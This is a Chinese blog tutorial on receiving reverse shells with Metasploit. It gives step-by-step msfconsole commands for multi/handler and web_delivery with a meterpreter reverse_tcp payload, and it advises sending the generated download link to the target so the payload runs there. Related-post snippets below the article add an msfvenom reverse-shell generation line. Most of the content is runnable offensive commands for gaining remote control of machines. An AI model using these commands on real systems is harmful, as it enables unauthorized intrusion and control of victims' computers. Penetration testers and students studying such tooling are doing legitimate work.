使用msf监听模块接收反弹shell

已于 2023-10-27 19:01:06 修改
阅读量2k 收藏 6
点赞数 1
文章标签: msf 反弹shell 网络安全 kali linux
于 2023-05-23 18:27:14 首次发布

Metasploit Framework(MSF)提供了多种方式来监听反弹 shell

Metasploit 的multi/handler 模块适用于大多数分段、非分段和更高级的有效负载。

使用 multi/handler 模块:这是 MSF 中最常用的模块之一,用于监听反弹 shell。它支持多个协议和 payload,可以根据需要进行配置。

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.100
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run

使用 exploit/multi/handler 模块:与 multi/handler 类似,但它支持更多的 exploit 和 payload。使用方法类似于 multi/handler。

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.100
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run

使用 exploit/multi/script/web_delivery 模块:该模块可以生成一个可执行文件或 PowerShell 脚本,用于在目标系统上下载和执行 payload。使用方法如下:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set LHOST 192.168.0.100
msf exploit(web_delivery) > set LPORT 4444
msf exploit(web_delivery) > run

该模块将生成一个下载链接,将其发送给目标系统即可。

使用run -j 而不是不带任何参数的run命令运行,可以在后台启动侦听器,从而在等待连接的时候执行其它命令。使用jobs命令可以获取当前活动的作业列表,包括等待连接的侦听器。使用session -i 和会话 ID 作为参数与其进行交互。

ccOCONuTT
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4627
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用
msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听
weixin_53884648的博客
10-11 5108
利用msfconsole进行永恒之蓝漏洞攻击,并且使用msfvonom进行Windows木马生成,之后通过msf把木马上传到目标机器,使用msf监听模块进行后渗透权限维持。
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
zzz6583zz的博客
06-15 976
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
msf常用模块功能整理
m0_55306747的博客
07-21 5886
整理一下msf的常用模块和功能
小白必学:msf基本使用
fly_enum的博客
10-31 690
网络安全很多技术干货,都可以共享给你们,如果你肯花时间沉下心去学习,它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享👉网安(嘿客红蓝对抗)所有方向的学习路线👈对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6325
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
msf生成木马监听
qq_30890029的博客
05-04 1210
run 或 exploit 开启监听状态。2.1开启python web服务。2.2通过开发的web服务下载木马。3.2 use选择监听模块。3.3 设置端口及ip。
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 不仅仅是一个简单的 shell,它是一个完整的后渗透环境,支持多种扩展模块和功能。它能够创建持久化的连接,即使在目标系统重启后也能保持控制。此外,Meterpreter 还允许测试者在不同的会话之间切换,...
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
msf5 自动攻击模块 db_autopwn
07-10
**msf5 自动攻击模块 db_autopwn 知识点详解** `db_autopwn`是Metasploit Framework(msf5)中的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块在安全审计和渗透测试过程中扮演...
msfvenom获取shell
01-03
仅用于测试 msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p ...msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.ma
MSF里侦听模块使用教程 exploit/multi/handler
热门推荐
qq_45249394的博客
11-25 1万+
标题关于MSF侦听模块的第一次使用 侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了,不管外网内网都能反弹shell,就是windows10的防火墙过不去,windows7的查不到,可能不更新的原因吧。如果想过墙只能自己加免杀的代码喽,反正我是还没学到呢。或者去百度shellter下载剥壳机自己加免杀的,有两个版本免费版和专业版,本人亲测免费版过不了wind...
2024年小白必学:msf基本使用_msf监听(1),2024年最新浅谈网络安全消息机制原理
2301_77121488的博客
05-11 781
网络安全很多技术干货,都可以共享给你们,如果你肯花时间沉下心去学习,它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享👉网安(嘿客红蓝对抗)所有方向的学习路线👈对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
2024年小白必学:msf基本使用_msf监听(2),2024年最新15个经典面试问题及回答思路
2301_77121488的博客
05-11 654
网络安全很多技术干货,都可以共享给你们,如果你肯花时间沉下心去学习,它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享👉网安(嘿客红蓝对抗)所有方向的学习路线👈对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
MSF 详解
m0_72125469的博客
05-19 4509
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
KALIMSF监听Windows7
weixin_60689826的博客
08-23 1019
利用MSF监听WIN7
Msfvenom建立后门程序指令及开启监听
Dreamsi_zhang的博客
08-13 7653
一、场景介绍
msf监听反弹shell
05-24
Metasploit Framework(MSF)提供了多种方式来监听反弹 shell,下面是一些常见的方法: 1. 使用 `multi/handler` 模块:这是 MSF 中最常用的模块之一,用于监听反弹 shell。它支持多个协议和 payload,可以根据需要进行配置。 ``` msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.100 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > run ``` 2. 使用 `exploit/multi/handler` 模块:与 `multi/handler` 类似,但它支持更多的 exploit 和 payload。使用方法类似于 `multi/handler`。 ``` msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.100 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > run ``` 3. 使用 `exploit/multi/script/web_delivery` 模块:该模块可以生成一个可执行文件或 PowerShell 脚本,用于在目标系统上下载和执行 payload。使用方法如下: ``` msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(web_delivery) > set LHOST 192.168.0.100 msf exploit(web_delivery) > set LPORT 4444 msf exploit(web_delivery) > run ``` 该模块将生成一个下载链接,将其发送给目标系统即可。 这些方法只是 MSF 中的一部分,你还可以使用其他模块和技术来监听反弹 shell。但无论使用哪种方法,都需要注意安全性和法律合规性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值